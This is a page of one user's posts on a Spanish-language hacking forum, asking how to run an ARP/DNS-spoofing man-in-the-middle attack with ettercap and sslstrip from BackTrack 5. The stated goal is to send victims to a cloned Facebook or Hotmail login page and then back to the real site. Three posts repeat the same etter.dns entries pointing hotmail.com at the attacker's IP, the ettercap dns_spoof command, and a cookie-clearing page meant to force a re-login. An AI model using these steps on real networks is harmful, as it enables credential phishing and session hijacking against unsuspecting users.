elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Los 10 CVE más críticos (peligrosos) de 2020


  Mostrar Mensajes
Páginas: 1 2 3 [4] 5 6
31  Seguridad Informática / Hacking / Re: ¿como redireccionar a una pagina falsa y que despues se muestre la original? en: 5 Enero 2012, 05:27 am
y como debo modificar la tabla DNS??  puesto que si indico que quiero que facebook se redireccione a la pagina con soporte php/jhs/asp, no pasa de ahi ... pienso que es un tipo de triangulacion o redireccionamiento triple o algo por el estilo, pero como lo indico??? o ¿como debo modificar la tabla DNS? ...
 
y pues la verdad no se nada de servidores con soporte php/jhs/asp, como empiezo o donde busco? o como debo hacerlo? por que ya busque demasiado pero nada cubre lo que necesito.
otra pregunta: ¿el servidor puede hacerse con apache? ... gracias
32  Seguridad Informática / Hacking / Re: ¿como cerrar conexiones para usar sslstrip? en: 5 Enero 2012, 05:17 am
veras, tengo una pc con windows xp para hacer las pruebas.

Primero inicio sesion en hotmail en la pc que tiene windows xp, despues con la otra hago todo el proceso del servidor apache con el codigo "que elimina las cookies" y hago el envenenamiento DNS con el ettercap redireccionando al servidor apache.

Despues intento navegar dentro de mi bandeja de entrada y no pasa nada  :s , todo esta muy normal.

Paso seguido compruebo con el konqueror de backtrack5, intento abrir hotmail pero hooo sorpresa!!! en lugar de hotmail me abre la pagina cargada en el servidor apache(lo que demuestra que el envenenamiento DNS esta correcto no??? )  y no me redirecciona despues al verdadero dominio de hotmail ...  saludos
33  Seguridad Informática / Hacking / ¿como redireccionar a una pagina falsa y que despues se muestre la original? en: 4 Enero 2012, 06:32 am
uso backtrack 5, y mi pregunta es esa, ¿como hago para reedireccionar a un usuario a una pagina falsa o clonada y que despues se vuelva a reedirigir a la pagina original?

he intentado con el ettercap, modifico la tabla DNS y clono por ejemplo la pagina de facebook con SET, y modifico

# *.facebook.com  A   MI_DIRECCION_IP

¿como puedo hacer que despues que el usuario ingrese sus datos en la pagina clonada, aparezca despues el dominio original de facebook por ejamplo? 

muchas gracias...
34  Seguridad Informática / Hacking / Re: sslstrip & arpspoof (cerrar conexión) en: 4 Enero 2012, 04:44 am
Hola a todos los que han comentado esta pregunta, la Conclusión fue muy buena (la de controlar una pagina que contenga un codigo que elimine las cookies) ... alguien de ustedes puede decirme ¿cual es la forma correcta para hacerlo? ... veran les cuento lo que hago... (no me ha funcionado, asi que agradeceria que me dijeran: ¿que es lo que hago mal? o ¿que me falta hacer? ...

COMIENZO modificando el fichero "index.html" ubicado en: " root/var/www "  (obiamente mis intenciones son las de hacer un servidor apache con el codigo funcional antes mencionado:

<META HTTP-EQUIV="REFRESH" CONTENT="5;URL=javascript:window.history.back();">

//Código en javascript que me elimina las cookies

<body >
 <script language="javascript" type="text/javascript">
 if (document.cookie != "") {
 if (confirm("Eliminar todas las Cookies?")) {
 la_cookie = document.cookie.split("; ")
 fecha_fin = new Date
 fecha_fin.setDate(fecha_fin.getDate()-1)
 for (i=0; i<la_cookie.length; i++) {
 mi_cookie = la_cookie.split("=")[0]
 document.cookie = mi_cookie + "=;expires=" + fecha_fin.toGMTString()
 }
 document.write("Se han eliminado: " + la_cookie.length + " Cookies ")
 }
 }
 </script>
 </body>

Lo copio y lo pego tal cual esta... Despues voy a: " backtrack,services,HTTPD,apache_start " (para activar un servidor apache)  cabe mencionar que borro las 2 carpetas que estan en la misma ubicacion que el "index.html" con la intencion de que no estorben en la apertura de la pagina...
paso seguido procedo a modificar la tabla dns abriendo una consola y tecleando :
#locate etter.dns
#nano /usr/share/ettercap/etter.dns
ya que me abre la tabla dns, procedo a sustituir las direcciones ip que estan ahi indicadas, por la mia (en la que ahora esta corriendo el servidor apache con el codigo para borrar las cookies)...
y como la pagina que quiero cerrar es la de hotmail, me que da de la siguiente manera... :

# microsoft sucks
# redirect it to www.linux.org
#

hotmail.com      A   MI_DIRECCION_IP
*.hotmail.com    A   MI_DIRECCION_IP
www.hotmail.com  PTR MI_DIRECCION_IP      # Wildcards in PTR are not allowed

guardo los cambios y procedo a ejecutar :  "ettercap -T -q -i wlan0 -P dns_spoof -M arp // // "

EN RESUMEN: lo que hice fue crear un servidor apache con el codigo para borrar las cookies antes indicado, despues Hacer un envenenemiento dns para reedirigir hotmail al servidor apache... lamentablemente no he tenido muy buenos resultados... ¿Podrian ayudarme?   muchas gracias...

http://foro.elhacker.net/hacking_avanzado/iquestcomo_cerrar_conexiones_para_usar_sslstrip-t349415.0.html;msg1702555;topicseen#ixzz1iSQEPoRi
35  Seguridad Informática / Hacking / ¿como cerrar conexiones para usar sslstrip? en: 4 Enero 2012, 03:43 am
veran, estaba buscando resolver mi duda y parace que alguien de este foro ya encontro la solucion, el problema es que no se en que tengo fallas, el tema se encuentra en esta direccion :   

http://foro.elhacker.net/hacking_avanzado/sslstrip_arpspoof_cerrar_conexion-t344668.0.html#ixzz1iN54fsOJ



Hola a todos los que han comentado esta pregunta, la Conclusión fue muy buena (la de controlar una pagina que contenga un codigo que elimine las cookies) ... alguien de ustedes puede decirme ¿cual es la forma correcta para hacerlo? ... veran les cuento lo que hago... (no me ha funcionado, asi que agradeceria que me dijeran: ¿que es lo que hago mal? o ¿que me falta hacer? ...

COMIENZO modificando el fichero "index.html" ubicado en: " root/var/www "  (obiamente mis intenciones son las de hacer un servidor apache con el codigo funcional antes mencionado:

<META HTTP-EQUIV="REFRESH" CONTENT="5;URL=javascript:window.history.back();">

//Código en javascript que me elimina las cookies

<body >
 <script language="javascript" type="text/javascript">
 if (document.cookie != "") {
 if (confirm("Eliminar todas las Cookies?")) {
 la_cookie = document.cookie.split("; ")
 fecha_fin = new Date
 fecha_fin.setDate(fecha_fin.getDate()-1)
 for (i=0; i<la_cookie.length; i++) {
 mi_cookie = la_cookie.split("=")[0]
 document.cookie = mi_cookie + "=;expires=" + fecha_fin.toGMTString()
 }
 document.write("Se han eliminado: " + la_cookie.length + " Cookies ")
 }
 }
 </script>
 </body>

Lo copio y lo pego tal cual esta... Despues voy a: " backtrack,services,HTTPD,apache_start " (para activar un servidor apache)  cabe mencionar que borro las 2 carpetas que estan en la misma ubicacion que el "index.html" con la intencion de que no estorben en la apertura de la pagina...
paso seguido procedo a modificar la tabla dns abriendo una consola y tecleando :
#locate etter.dns
#nano /usr/share/ettercap/etter.dns
ya que me abre la tabla dns, procedo a sustituir las direcciones ip que estan ahi indicadas, por la mia (en la que ahora esta corriendo el servidor apache con el codigo para borrar las cookies)...
y como la pagina que quiero cerrar es la de hotmail, me que da de la siguiente manera... :

# microsoft sucks ;)
# redirect it to www.linux.org
#

hotmail.com      A   MI_DIRECCION_IP
*.hotmail.com    A   MI_DIRECCION_IP
www.hotmail.com  PTR MI_DIRECCION_IP      # Wildcards in PTR are not allowed

guardo los cambios y procedo a ejecutar :  "ettercap -T -q -i wlan0 -P dns_spoof -M arp // // "

EN RESUMEN: lo que hice fue crear un servidor apache con el codigo para borrar las cookies antes indicado, despues Hacer un envenenemiento dns para reedirigir hotmail al servidor apache... lamentablemente no he tenido muy buenos resultados... ¿Podrian ayudarme?   muchas gracias...
36  Seguridad Informática / Hacking / Re: sslstrip & arpspoof (cerrar conexión) en: 4 Enero 2012, 03:25 am
Hola a todos los que han comentado esta pregunta, la Conclusión fue muy buena (la de controlar una pagina que contenga un codigo que elimine las cookies) ... alguien de ustedes puede decirme ¿cual es la forma correcta para hacerlo? ... veran les cuento lo que hago... (no me ha funcionado, asi que agradeceria que me dijeran: ¿que es lo que hago mal? o ¿que me falta hacer? ...

COMIENZO modificando el fichero "index.html" ubicado en: " root/var/www "  (obiamente mis intenciones son las de hacer un servidor apache con el codigo funcional antes mencionado:

<META HTTP-EQUIV="REFRESH" CONTENT="5;URL=javascript:window.history.back();">

//Código en javascript que me elimina las cookies

<body >
 <script language="javascript" type="text/javascript">
 if (document.cookie != "") {
 if (confirm("Eliminar todas las Cookies?")) {
 la_cookie = document.cookie.split("; ")
 fecha_fin = new Date
 fecha_fin.setDate(fecha_fin.getDate()-1)
 for (i=0; i<la_cookie.length; i++) {
 mi_cookie = la_cookie.split("=")[0]
 document.cookie = mi_cookie + "=;expires=" + fecha_fin.toGMTString()
 }
 document.write("Se han eliminado: " + la_cookie.length + " Cookies ")
 }
 }
 </script>
 </body>

Lo copio y lo pego tal cual esta... Despues voy a: " backtrack,services,HTTPD,apache_start " (para activar un servidor apache)  cabe mencionar que borro las 2 carpetas que estan en la misma ubicacion que el "index.html" con la intencion de que no estorben en la apertura de la pagina...
paso seguido procedo a modificar la tabla dns abriendo una consola y tecleando :
#locate etter.dns
#nano /usr/share/ettercap/etter.dns
ya que me abre la tabla dns, procedo a sustituir las direcciones ip que estan ahi indicadas, por la mia (en la que ahora esta corriendo el servidor apache con el codigo para borrar las cookies)...
y como la pagina que quiero cerrar es la de hotmail, me que da de la siguiente manera... :

# microsoft sucks ;)
# redirect it to www.linux.org
#

hotmail.com      A   MI_DIRECCION_IP
*.hotmail.com    A   MI_DIRECCION_IP
www.hotmail.com  PTR MI_DIRECCION_IP      # Wildcards in PTR are not allowed

guardo los cambios y procedo a ejecutar :  "ettercap -T -q -i wlan0 -P dns_spoof -M arp // // "

EN RESUMEN: lo que hice fue crear un servidor apache con el codigo para borrar las cookies antes indicado, despues Hacer un envenenemiento dns para reedirigir hotmail al servidor apache... lamentablemente no he tenido muy buenos resultados... ¿Podrian ayudarme?   muchas gracias...




 

37  Comunicaciones / Redes / ¿cual es la diferencia entre un ataque DDOS y un ping flood? en: 30 Diciembre 2011, 20:43 pm
existe alguna diferencia entre estos 2 ataques?? o son lo mismo?
38  Comunicaciones / Redes / ¿como crear un servidor apache para que no solo funcione en red local? en: 7 Diciembre 2011, 07:57 am
He intentado crear un servidor apache con backtrack 5, cuando lo pruebo con otra pc dentro de mi red local, este funciona de maravilla, pero cuando mando el link a una persona por messenger o cualquier medio de comunicacion, el link ( mi ip) no les abre ningun servidor web...  ¿que estoy omitiendo? o ¿que estoy haciendo mal? ... ¿como puedo configurarlo para que cualquier persona en el mundo pueda visualizarlo? ( tal vez debo poner mi ip publica en lugar de la privada, cualquier dato se los agradeceria demasiado)... recuerderden que uso backtrack 5 ... este esta basado en ubuntu 10.04 lucid lynx... muchas gracias...
39  Comunicaciones / Redes / Re: ¿como crear un servidor (para compartir archivos=ftp) con apache en backtrack 5? en: 25 Noviembre 2011, 04:59 am
solo abriendo los puertos?? :S  no hace falta poner en vez de la direccion privada la publica? o algo asi? :S... me puedes decir donde estan esos articulos? no los encuentro... gracias!
40  Comunicaciones / Redes / Re: ¿como cerrar una pagina de internet para que el usuario vuelva a abrirla? en: 25 Noviembre 2011, 03:04 am
dime donde puedo encontrar un tutorial de ese tema!... te lo agradeceria mucho!!! :D
Páginas: 1 2 3 [4] 5 6
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines